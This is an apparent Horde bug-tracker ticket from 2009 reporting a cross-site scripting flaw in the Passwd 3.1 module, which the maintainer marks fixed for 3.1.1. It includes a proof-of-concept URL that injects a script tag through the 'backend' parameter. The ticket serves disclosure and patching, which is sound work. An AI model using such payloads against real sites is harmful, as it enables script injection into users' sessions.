
[#8398] Cross Site Scripting Vulnerability
Summary: Cross Site Scripting Vulnerability
Queue: Passwd
Queue Version: 3.1
Type: Bug
State: Resolved
Priority: 2. Medium
Owners: chuck (at) horde (dot) org
Requester: security (at) davidwharton (dot) us
Created: 07/03/2009 (5795 days ago)
Due:
Updated: 07/05/2009 (5793 days ago)
Assigned:
Resolved: 07/05/2009 (5793 days ago)
Milestone:
Patch: No

History
07/05/2009 05:21:51 PM Chuck Hagenbuch Comment #3
Assigned to Chuck Hagenbuch
State ⇒ Resolved
Fixed for 3.1.1 - thanks.
07/03/2009 06:45:14 PM security (at) davidwharton (dot) us Comment #1
Priority ⇒ 2. Medium
Patch ⇒ No
Milestone ⇒
Queue ⇒ Passwd
Summary ⇒ Cross Site Scripting Vulnerability
Type ⇒ Bug
State ⇒ Unconfirmed
A cross site scripting vulnerability exists.  Proof of concept:



http://hordeserver.com/horde/passwd/main.php?backend="><!--a75c305b1c0a6022--><script>alert('XSS')</script>&userid=stevejobs&return_to=&oldpassword=foo&newpassword0=foo&newpassword1=foo&submit=Change%20Password
